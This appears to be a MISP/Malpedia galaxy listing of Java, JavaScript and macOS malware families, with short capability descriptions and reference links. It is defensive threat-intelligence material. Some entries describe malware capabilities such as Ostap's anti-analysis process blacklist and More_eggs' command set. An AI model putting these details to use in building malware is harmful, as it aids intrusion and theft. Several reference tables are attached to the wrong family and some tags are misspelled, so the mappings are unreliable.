The tag is: `misp-galaxy:malpedia="CrossRAT"`

CrossRAT is also known as:

- Trupto

*Table 1091. Table References*

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<tr>
<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/jar.crossrat">https://malpedia.caad.fkie.fraunhofer.de/details/jar.crossrat</a></td>
</tr>
<tr>
<td><a href="https://objective-see.com/blog/blog_0x28.html">https://objective-see.com/blog/blog_0x28.html</a></td>
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FEimea RAT

The tag is: misp-galaxy:malpedia="FEimea RAT"

FEimea RAT is also known as:

Table 1092. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/jar.feimea_rat">https://malpedia.caad.fkie.fraunhofer.de/details/jar.feimea_rat</a></td>
</tr>
<tr>
<td><a href="https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/">https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/</a></td>
</tr>
</tbody>
</table>

IceRat

According to Karsten Hahn, this malware is actually written in JPHP, but can be treated similar to .class files produced by Java. IceRat has been observed to carry out information stealing and mining.

The tag is: misp-galaxy:malpedia="IceRat"

IceRat is also known as:

Table 1093. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/jar.icerat">https://malpedia.caad.fkie.fraunhofer.de/details/jar.icerat</a></td>
</tr>
<tr>
<td><a href="https://www.gdatasoftware.com/blog/icerat-evades-antivirus-by-using-jphp">https://www.gdatasoftware.com/blog/icerat-evades-antivirus-by-using-jphp</a></td>
</tr>
</tbody>
</table>

JavaDispCash

JavaDispCash is a piece of malware designed for ATMs. The compromise happens by using the JVM attach-API on the ATM's local application and the goal is to remotely control its operation. The malware's primary feature is the ability to dispense cash. The malware also spawns a local port (65413) listening for commands from the attacker which needs to be located in the same internal network.

The tag is: misp-galaxy:malpedia="JavaDispCash"

JavaDispCash is also known as:

Table 1094. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/jar.javadispcash">https://malpedia.caad.fkie.fraunhofer.de/details/jar.javadispcash</a></td>
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<tr>
<td><a href="https://twitter.com/r3c0nst/status/1111254169623674882">https://twitter.com/r3c0nst/status/1111254169623674882</a></td>
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JavaLocker

The tag is: `misp-galaxy:malpedia="JavaLocker"`

JavaLocker is also known as:

- JavaEncrypt Ransomware

Table 1095. Table References

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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/jar.javlocker">https://malpedia.caad.fkie.fraunhofer.de/details/jar.javlocker</a></td>
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<tr>
<td><a href="https://dissectingmalwa.re/why-would-you-even-bother-javalocker.html">https://dissectingmalwa.re/why-would-you-even-bother-javalocker.html</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2020/03/javalocker-ransomware.html">https://id-ransomware.blogspot.com/2020/03/javalocker-ransomware.html</a></td>
</tr>
</tbody>
</table>

jRAT

jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of a red hering reference to jrat.io.

The tag is: `misp-galaxy:malpedia="jRAT"`

jRAT is also known as:

- Jacksbot

Table 1096. Table References

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<tr>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat">https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat</a></td>
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<tr>
<td><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/">https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/</a></td>
</tr>
<tr>
<td><a href="https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/">https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/</a></td>
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<tr>
<td><a href="https://research.checkpoint.com/malware-against-the-c-monoculture/">https://research.checkpoint.com/malware-against-the-c-monoculture/</a></td>
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jSpy

The tag is: `misp-galaxy:malpedia="jSpy"`
jSpy is also known as:

Table 1097. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/jar.jspy">https://malpedia.caad.fkie.fraunhofer.de/details/jar.jspy</a></td>
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<tr>
<td><a href="https://how-to-hack.net/hacking-guides/review-of-jspy-rat-jspy-net/">https://how-to-hack.net/hacking-guides/review-of-jspy-rat-jspy-net/</a></td>
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**Octopus Scanner**

The tag is: *misp-galaxy:malpedia=“Octopus Scanner”*

Octopus Scanner is also known as:

Table 1098. Table References

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<th>Links</th>
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<tr>
<td><a href="http://blog.nsfocus.net/github-ocs-0605/">http://blog.nsfocus.net/github-ocs-0605/</a></td>
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</tbody>
</table>

**Qarallax RAT**

According to SpiderLabs, in May 2015 the "company" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT).

The tag is: *misp-galaxy:malpedia=“Qarallax RAT”*

Qarallax RAT is also known as:

Table 1099. Table References

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<tr>
<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/jar.qarallax_rat">https://malpedia.caad.fkie.fraunhofer.de/details/jar.qarallax_rat</a></td>
</tr>
</tbody>
</table>

**Qealler**

The tag is: *misp-galaxy:malpedia=“Qealler”*

Qealler is also known as:

- Pyrogenic Infostealer
QRat

QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax.

The tag is: `misp-galaxy:malpedia="QRat"`

QRat is also known as:

- Quaverse RAT

Ratty

Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist.

The tag is: `misp-galaxy:malpedia="Ratty"`
Ratty is also known as:

Table 1102. Table References

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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty">https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty</a></td>
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**STRRAT**

The tag is: *misp-galaxy:malpedia="STRRAT"*

STRRAT is also known as:

Table 1103. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/jar.strrat">https://malpedia.caad.fkie.fraunhofer.de/details/jar.strrat</a></td>
</tr>
<tr>
<td><a href="https://www.gdatasoftware.com/blog/strrat-crimson">https://www.gdatasoftware.com/blog/strrat-crimson</a></td>
</tr>
</tbody>
</table>

**SupremeBot**

The tag is: *misp-galaxy:malpedia="SupremeBot"*

SupremeBot is also known as:

- BlazeBot

Table 1104. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/jar.supremebot">https://malpedia.caad.fkie.fraunhofer.de/details/jar.supremebot</a></td>
</tr>
<tr>
<td><a href="https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/">https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/</a></td>
</tr>
</tbody>
</table>

**AIRBREAK**

AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages.

The tag is: *misp-galaxy:malpedia="AIRBREAK"*

AIRBREAK is also known as:

- Orz

Table 1105. Table References
Bateleur

The tag is: `misp-galaxy:malpedia="Bateleur"`

Bateleur is also known as:

Table 1106. Table References

[[Links]

- [https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak](https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak)
- [https://www.secureworks.com/research/threat-profiles/bronze-mohawk](https://www.secureworks.com/research/threat-profiles/bronze-mohawk)
]

BELLHOP

- BELLHOP is a JavaScript backdoor interpreted using the native Windows Scripting Host (WSH). After performing some basic host information gathering, the BELLHOP dropper downloads a base64-encoded blob of JavaScript to disk and sets up persistence in three ways:
  - Creating a Run key in the Registry
  - Creating a RunOnce key in the Registry
  - Creating a persistent named scheduled task
  - BELLHOP communicates using HTTP and HTTPS with primarily benign sites such as Google Docs and PasteBin.

The tag is: `misp-galaxy:malpedia="BELLHOP"`

BELLHOP is also known as:

Table 1107. Table References

[[Links]

- [https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur](https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur)
- [https://www.secureworks.com/research/threat-profiles/gold-niagara](https://www.secureworks.com/research/threat-profiles/gold-niagara)
]

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CACTUSTORCH

According to the GitHub repo, CACTUSTORCH is a JavaScript and VBScript shellcode launcher. It will spawn a 32 bit version of the binary specified and inject shellcode into it.

The tag is: misp-galaxy:malpedia="CACTUSTORCH"

CACTUSTORCH is also known as:

Table 1108. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/js.cactustorch">https://malpedia.caad.fkie.fraunhofer.de/details/js.cactustorch</a></td>
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<td><a href="https://www.macnica.net/file/mpression_automobile.pdf">https://www.macnica.net/file/mpression_automobile.pdf</a></td>
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<tr>
<td><a href="https://www.codercto.com/a/46729.html">https://www.codercto.com/a/46729.html</a></td>
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<tr>
<td><a href="https://github.com/mdsecactivebreach/CACTUSTORCH">https://github.com/mdsecactivebreach/CACTUSTORCH</a></td>
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CryptoNight

WebAssembly-based crypto miner.

The tag is: misp-galaxy:malpedia="CryptoNight"

CryptoNight is also known as:

Table 1109. Table References

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<tr>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/js.cryptonight">https://malpedia.caad.fkie.fraunhofer.de/details/js.cryptonight</a></td>
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<tr>
<td><a href="https://gist.github.com/JohnLaTwC/112483eb9aed27dd2184966711c722ec">https://gist.github.com/JohnLaTwC/112483eb9aed27dd2184966711c722ec</a></td>
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<tr>
<td><a href="https://twitter.com/JohnLaTwC/status/983011262731714565">https://twitter.com/JohnLaTwC/status/983011262731714565</a></td>
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CukieGrab

The tag is: misp-galaxy:malpedia="CukieGrab"

CukieGrab is also known as:
Roblox Trade Assist

Table 1110. Table References

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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/js.cukiegrab_crx">https://malpedia.caad.fkie.fraunhofer.de/details/js.cukiegrab_crx</a></td>
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DNSRat

The tag is: *misp-galaxy:malpedia="DNSRat"*

DNSRat is also known as:

- DNSbot

Table 1111. Table References

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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/js.dnsrat">https://malpedia.caad.fkie.fraunhofer.de/details/js.dnsrat</a></td>
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Enrume

The tag is: *misp-galaxy:malpedia="Enrume"*

Enrume is also known as:

- Ransom32

Table 1112. Table References

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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/js.enrume">https://malpedia.caad.fkie.fraunhofer.de/details/js.enrume</a></td>
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EVILNUM (Javascript)

The tag is: *misp-galaxy:malpedia="EVILNUM (Javascript)"*

EVILNUM (Javascript) is also known as:

Table 1113. Table References

<table>
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</table>
**grelos**

grelos is a skimmer used for magecart-style attacks.

The tag is: *misp-galaxy:malpedia="grelos"

grelos is also known as:

*Table 1114. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/js.grelos">https://malpedia.caad.fkie.fraunhofer.de/details/js.grelos</a></td>
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<td><a href="https://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745">https://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745</a></td>
</tr>
<tr>
<td><a href="https://www.riskiq.com/blog/labs/magecart-medialand/">https://www.riskiq.com/blog/labs/magecart-medialand/</a></td>
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<tr>
<td><a href="https://community.riskiq.com/article/8c4b4a7a">https://community.riskiq.com/article/8c4b4a7a</a></td>
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**Griffon**

The tag is: *misp-galaxy:malpedia="Griffon"

Griffon is also known as:

*Table 1115. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon">https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon</a></td>
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<tr>
<td><a href="https://twitter.com/ItsReallyNick/status/1059898708286939136">https://twitter.com/ItsReallyNick/status/1059898708286939136</a></td>
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inter is also known as:

**Table 1116. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/js.inter">https://malpedia.caad.fkie.fraunhofer.de/details/js.inter</a></td>
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<tr>
<td><a href="https://www.fortinet.com/blog/threat-research/inter-skimmer-for-all.html">https://www.fortinet.com/blog/threat-research/inter-skimmer-for-all.html</a></td>
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The tag is: **misp-galaxy:malpedia=“jspRAT”**

jspRAT is also known as:

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/js.jsprat">https://malpedia.caad.fkie.fraunhofer.de/details/js.jsprat</a></td>
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<td><a href="https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators">https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators</a></td>
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The tag is: **misp-galaxy:malpedia=“KopiLuwak”**

KopiLuwak is also known as:

**Table 1118. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak">https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak</a></td>
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<td><a href="https://securelist.com/shedding-skin-turlas-fresh-faces/88069/">https://securelist.com/shedding-skin-turlas-fresh-faces/88069/</a></td>
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LNKR

The tag is: misp-galaxy:malpedia="LNKR"

LNKR is also known as:

Table 1119. Table References

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<td><a href="https://github.com/Zenexer/lnkr">https://github.com/Zenexer/lnkr</a></td>
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<td><a href="https://github.com/Zenexer/lnkr/blob/master/recon/extensions/fanagokoaogopceablgmpndejhedkjjb/README.md">https://github.com/Zenexer/lnkr/blob/master/recon/extensions/fanagokoaogopceablgmpndejhedkjjb/README.md</a></td>
</tr>
<tr>
<td><a href="https://www.riskiq.com/blog/labs/lnkr-browser-extension/">https://www.riskiq.com/blog/labs/lnkr-browser-extension/</a></td>
</tr>
<tr>
<td><a href="https://krebsonsecurity.com/2020/03/the-case-for-limiting-your-browser-extensions/">https://krebsonsecurity.com/2020/03/the-case-for-limiting-your-browser-extensions/</a></td>
</tr>
</tbody>
</table>

magecart

Magecart is a malware framework intended to steal credit card information from compromised eCommerce websites. Used in criminal activities, it’s a sophisticated implant built on top of relays, command and controls and anonymizers used to steal eCommerce customers' credit card information. The first stage is typically implemented in Javascript included into a compromised checkout page. It copies data from "input fields" and send them to a relay which collects credit cards coming from a subset of compromised eCommercees and forwards them to Command and Control servers.

The tag is: misp-galaxy:malpedia="magecart"

magecart is also known as:

Table 1120. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart">https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart</a></td>
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<td><a href="https://sansec.io/research/magento-2-persistent-parasite">https://sansec.io/research/magento-2-persistent-parasite</a></td>
</tr>
<tr>
<td><a href="https://sansec.io/research/north-korea-magecart">https://sansec.io/research/north-korea-magecart</a></td>
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<tr>
<td><a href="https://www.riskiq.com/blog/labs/magecart-medialand/">https://www.riskiq.com/blog/labs/magecart-medialand/</a></td>
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<tr>
<td><a href="https://maxkersten.nl/2020/02/17/following-the-tracks-of-magecart-12/">https://maxkersten.nl/2020/02/17/following-the-tracks-of-magecart-12/</a></td>
</tr>
</tbody>
</table>

*https://www.riskiq.com/blog/labs/magecart-nutribullet/*

*https://community.riskiq.com/article/fda1f967*

*https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/*


*https://sansec.io/labs/2020/01/25/magecart-hackers-arrested/*


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*https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/*


*https://marcoramilli.com/2020/02/19/uncovering-new-magecart-implant-attacking-ecommerce/*


*https://www.perimeterx.com/blog/analyzing_magecart_malware_from_zero_to_hero/*


*https://community.riskiq.com/article/30f22a00*


*https://community.riskiq.com/article/14924d61*

*https://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html*

*https://maxkersten.nl/2020/01/20/ticket-resellers-infected-with-a-credit-card-skimmer/*

*https://medium.com/reflectiz/csp-the-right-solution-for-the-web-skimming-pandemic-acb7a4414218*

*https://sansec.io/research/magecart-corona-lockdown*

*https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/*
More_eggs

More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are:

- `d&exec` = download and execute PE file
- `gtfo` = delete files/startup entries and terminate
- `more_eggs` = download additional/new scripts
- `more_onion` = run new script and terminate current script
- `more_power` = run command shell commands

The tag is: `misp-galaxy:malpedia="More_eggs"`

More_eggs is also known as:

- SKID
- SpicyOmelette

Table 1121. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs">https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs</a></td>
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<td><a href="https://attack.mitre.org/software/S0284/">https://attack.mitre.org/software/S0284/</a></td>
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<td><a href="https://github.com/eset/malware-ioc/tree/master/evilnum">https://github.com/eset/malware-ioc/tree/master/evilnum</a></td>
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NanHaiShu

NanHaiShu is a remote access tool and JScript backdoor used by Leviathan. NanHaiShu has been used to target government and private-sector organizations that have relations to the South China Sea dispute.

The tag is: *misp-galaxy:malpedia=*"NanHaiShu"

NanHaiShu is also known as:

Table 1122. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/js.nanhaishu">https://malpedia.caad.fkie.fraunhofer.de/details/js.nanhaishu</a></td>
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<td><a href="https://attack.mitre.org/software/S0228/">https://attack.mitre.org/software/S0228/</a></td>
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**NodeRAT**

The tag is: *misp-galaxy:malpedia=*"NodeRAT"*

NodeRAT is also known as:

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<tr>
<td>Links</td>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/js.node_rat">https://malpedia.caad.fkie.fraunhofer.de/details/js.node_rat</a></td>
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<tr>
<td><a href="https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html">https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html</a></td>
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</table>

**Ostap**

Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. Recent versions of Ostap query WMI to check for a blacklist of running processes:

AgentSimulator.exe anti-virus.EXE BehaviorDumper BennyDB.exe ctfmon.exe fakepos_bin FrzState2k gemu-ga.exe (Possible misspelling of Qemu hypervisor's guest agent, qemu-ga.exe) ImmunityDebugger.exe KMS Server Service.exe ProcessHacker procexp Proxifier.exe python tcppdump VBoxService VBoxTray.exe VmRemoteGuest vmtoolsd VMware2B.exe VzService.exe winace Wireshark

If a blacklisted process is found, the malware terminates.

Ostap has been observed delivering other malware families, including Nymaim, Backswap and TrickBot.

The tag is: *misp-galaxy:malpedia=*"Ostap"*

Ostap is also known as:

<table>
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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/js.ostap">https://malpedia.caad.fkie.fraunhofer.de/details/js.ostap</a></td>
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<td><a href="https://www.bromium.com/deobfuscating-ostap-trickbots-javascript-downloader/">https://www.bromium.com/deobfuscating-ostap-trickbots-javascript-downloader/</a></td>
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<tr>
<td><a href="https://www.intrinsec.com/deobfuscating-hunting-ostap/">https://www.intrinsec.com/deobfuscating-hunting-ostap/</a></td>
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**Powmet**

The tag is: **misp-galaxy:malpedia=“Powmet”**

Powmet is also known as:

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</table>

**QNodeService**

According to Trend Micro, this is a Node.js based malware, that can download/upload/execute files, steal credentials from Chrome/Firefox browsers, and perform file management, among other things. It targets Windows and has components for both 32 and 64bit.

The tag is: **misp-galaxy:malpedia=“QNodeService”**

QNodeService is also known as:

**Table 1126. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/js.qnodeservice">https://malpedia.caad.fkie.fraunhofer.de/details/js.qnodeservice</a></td>
</tr>
</tbody>
</table>

**QUICKCAFE**

QUICKCAFE is an encrypted JavaScript downloader for QUICKRIDE.POWER that exploits the ActiveX M2Soft vulnerabilities. QUICKCAFE is obfuscated using JavaScript Obfuscator.

The tag is: **misp-galaxy:malpedia=“QUICKCAFE”**

QUICKCAFE is also known as:

**Table 1127. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/js.quickcafe">https://malpedia.caad.fkie.fraunhofer.de/details/js.quickcafe</a></td>
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scanbox

The tag is: misp-galaxy:malpedia="scanbox"

scanbox is also known as:

Table 1128. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox">https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-mohawk">https://www.secureworks.com/research/threat-profiles/bronze-mohawk</a></td>
</tr>
<tr>
<td><a href="http://resources.infosecinstitute.com/scanbox-framework/">http://resources.infosecinstitute.com/scanbox-framework/</a></td>
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</table>

SQLRat

SQLRat campaigns typically involve a lure document that includes an image overlayed by a VB Form trigger. Once a user has double-clicked the embedded image, the form executes a VB setup script. The script writes files to the path %appdata%\Roaming\Microsoft\Templates, then creates two task entries triggered to run daily. The scripts are responsible for deobfuscating and executing the main JavaScript file mspromo.dot. The file uses a character insertion obfuscation technique, making it appear to contain Chinese characters. After deobfuscating the file, the main JavaScript is easily recognizable. It contains a number of functions designed to drop files and execute scripts on a host system. The SQLRat script is designed to make a direct SQL connection to a Microsoft database controlled by the attackers and execute the contents of various tables.

The tag is: misp-galaxy:malpedia="SQLRat"

SQLRat is also known as:

Table 1129. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/js.sqlrat">https://malpedia.caad.fkie.fraunhofer.de/details/js.sqlrat</a></td>
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</table>
**Starfighter (Javascript)**

According to the author, this is a JavaScript based Empire launcher that runs with its own embedded powershell host to not be dependent on local powershell availability.

The tag is: `misp-galaxy:malpedia="Starfighter (Javascript)"

Starfighter (Javascript) is also known as:

*Table 1130. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/js.starfighter">https://malpedia.caad.fkie.fraunhofer.de/details/js.starfighter</a></td>
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<tr>
<td><a href="https://github.com/Cn33liz/StarFighters">https://github.com/Cn33liz/StarFighters</a></td>
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**HTML5 Encoding**

The tag is: `misp-galaxy:malpedia="HTML5 Encoding"

HTML5 Encoding is also known as:

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext">https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext</a></td>
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**Maintools.js**

Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'.

The tag is: `misp-galaxy:malpedia="Maintools.js"

Maintools.js is also known as:

*Table 1132. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_maintools">https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_maintools</a></td>
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<td><a href="https://twitter.com/JohnLaTwC/status/915590893155098629">https://twitter.com/JohnLaTwC/status/915590893155098629</a></td>
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**Unidentified JS 001 (APT32 Profiler)**

The tag is: `misp-galaxy:malpedia="Unidentified JS 001 (APT32 Profiler)"`
Unidentified JS 001 (APT32 Profiler) is also known as:

Table 1133. Table References

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<td><a href="https://community.riskiq.com/projects/53b4bd1e-dad0-306b-706b-7712-d2a608400c8f">https://community.riskiq.com/projects/53b4bd1e-dad0-306b-706b-7712-d2a608400c8f</a></td>
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<td><a href="https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef">https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef</a></td>
</tr>
</tbody>
</table>

Unidentified JS 003 (Emotet Downloader)

According to Max Kersten, Emotet is dropped by a procedure spanned over multiple stages. The first stage is an office file that contains a macro. This macro then loads the second stage, which is either a PowerShell script or a piece of JavaScript, which is this family entry.

The tag is: misp-galaxy:malpedia="Unidentified JS 003 (Emotet Downloader)"

Unidentified JS 003 (Emotet Downloader) is also known as:

Table 1134. Table References

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<tr>
<td><a href="https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-javascript-downloader/">https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-javascript-downloader/</a></td>
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</table>

Unidentified JS 004

A simple loader written in JavaScript found by Marco Ramilli.

The tag is: misp-galaxy:malpedia="Unidentified JS 004"

Unidentified JS 004 is also known as:

Table 1135. Table References

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Unidentified JS 002

The tag is: misp-galaxy:malpedia="Unidentified JS 002"

Unidentified JS 002 is also known as:

Table 1136. Table References

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Valak

The tag is: `misg-galaxy:malpedia="Valak"

Valak is also known as:

- Valek

Table 1137. Table References

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<td><a href="https://twitter.com/malware_traffic/status/1207824548021886977">https://twitter.com/malware_traffic/status/1207824548021886977</a></td>
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<td><a href="https://security-soup.net/analysis-of-valak-maldoc/">https://security-soup.net/analysis-of-valak-maldoc/</a></td>
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<td><a href="https://www.cybereason.com/blog/valak-more-than-meets-the-eye">https://www.cybereason.com/blog/valak-more-than-meets-the-eye</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/valak-evolution/">https://unit42.paloaltonetworks.com/valak-evolution/</a></td>
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<tr>
<td><a href="https://blog.talosintelligence.com/2020/07/valak-emerges.html">https://blog.talosintelligence.com/2020/07/valak-emerges.html</a></td>
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witchcoven

The tag is: `misg-galaxy:malpedia="witchcoven"

witchcoven is also known as:

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<td><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf</a></td>
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AppleJeus (OS X)

The tag is: `misg-galaxy:malpedia="AppleJeus (OS X)"

AppleJeus (OS X) is also known as:

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Bella

The tag is: *misp-galaxy:malpedia*="Bella"

Bella is also known as:

Table 1140. Table References

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<td><a href="https://threatintel.blog/OPBlueRaven-Part2/">https://threatintel.blog/OPBlueRaven-Part2/</a></td>
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<td><a href="https://github.com/kai5263499/Bella">https://github.com/kai5263499/Bella</a></td>
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<td><a href="https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/">https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/</a></td>
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Bundlore

The tag is: *misp-galaxy:malpedia*="Bundlore"

Bundlore is also known as:
SurfBuyer

Table 1141. Table References

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<td><a href="https://blog.confiant.com/new-macos-bundlore-loader-analysis-ca16d19c058c">https://blog.confiant.com/new-macos-bundlore-loader-analysis-ca16d19c058c</a></td>
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Careto

The tag is: `misp-galaxy:malpedia="Careto"`

Careto is also known as:

- Appetite
- Mask

Table 1142. Table References

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<td><a href="https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed">https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed</a></td>
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Casso

The tag is: `misp-galaxy:malpedia="Casso"`

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.casso">https://malpedia.caad.fkie.fraunhofer.de/details/osx.casso</a></td>
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</tbody>
</table>

CoinThief

CoinThief was a malware package designed to steal Bitcoins from the victim, consisting of a binary patcher, browser extensions, and a backdoor component.

It was spreading in early 2014 from several different sources: - on Github (where the trojanized compiled binary didn’t match the displayed source code), o - on popular and trusted download sites line CNET's Download.com or MacUpdate.com, and - as cracked applications via torrents
camouflaged as Bitcoin Ticker TTM, BitVanity, StealthBit, Litecoin Ticker, BBEdit, Pixelmator, Angry Birds and Delicious Library.

The patcher's role was to locate and modify legitimate versions of the Bitcoin-Qt wallet application. The analyzed malware samples targeted versions of Bitcoin-Qt 0.8.1, 0.8.0 and 0.8.5. The earlier patch modified Bitcoin-Qt adding malicious code that would send nearly all the victim's Bitcoins to one of the hard-coded addresses belonging to the attacker.

The browser extensions targeted Chrome and Firefox and are disguised as a “Pop-up blocker”. The extensions monitored visited websites, download malicious JavaScripts and injected them into various Bitcoin-related websites (mostly Bitcoin exchanges and online wallet sites). The injected JS scripts were able to modify transactions to redirect Bitcoin transfers to an attacker's address or simply harvest login credentials to the targeted online service.

The backdoor enabled the attacker to take full control over the victim's computer: - collect information about the infected computer - execute arbitrary shell scripts on the target computer - upload an arbitrary file from the victim’s hard drive to a remote server - update itself to a newer version

The tag is: *misp-galaxy:malpedia="CoinThief"*

CoinThief is also known as:

Table 1144. Table References

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<td><a href="https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed">https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed</a></td>
</tr>
<tr>
<td><a href="https://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/">https://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/</a></td>
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### Coldroot RAT

The tag is: *misp-galaxy:malpedia="Coldroot RAT"*

Coldroot RAT is also known as:

Table 1145. Table References

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<td><a href="https://objective-see.com/blog/blog_0x2A.html">https://objective-see.com/blog/blog_0x2A.html</a></td>
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### CpuMeaner

The tag is: *misp-galaxy:malpedia="CpuMeaner"*

CpuMeaner is also known as:
**CreativeUpdater**

The tag is: *misp-galaxy:malpedia="CreativeUpdater"*

CreativeUpdater is also known as:

**Crisis**

The tag is: *misp-galaxy:malpedia="Crisis"*

Crisis is also known as:

**Crossrider**

The tag is: *misp-galaxy:malpedia="Crossrider"*

Crossrider is also known as:
Dacls (OS X)

The tag is: misp-galaxy:malpedia="Dacls (OS X)"

Dacls (OS X) is also known as:

Table 1150. Table References

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<td><a href="https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/">https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/</a></td>
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<td><a href="https://objective-see.com/blog/blog_0x5F.html">https://objective-see.com/blog/blog_0x5F.html</a></td>
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<td><a href="https://objective-see.com/blog/blog_0x57.html">https://objective-see.com/blog/blog_0x57.html</a></td>
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DarthMiner

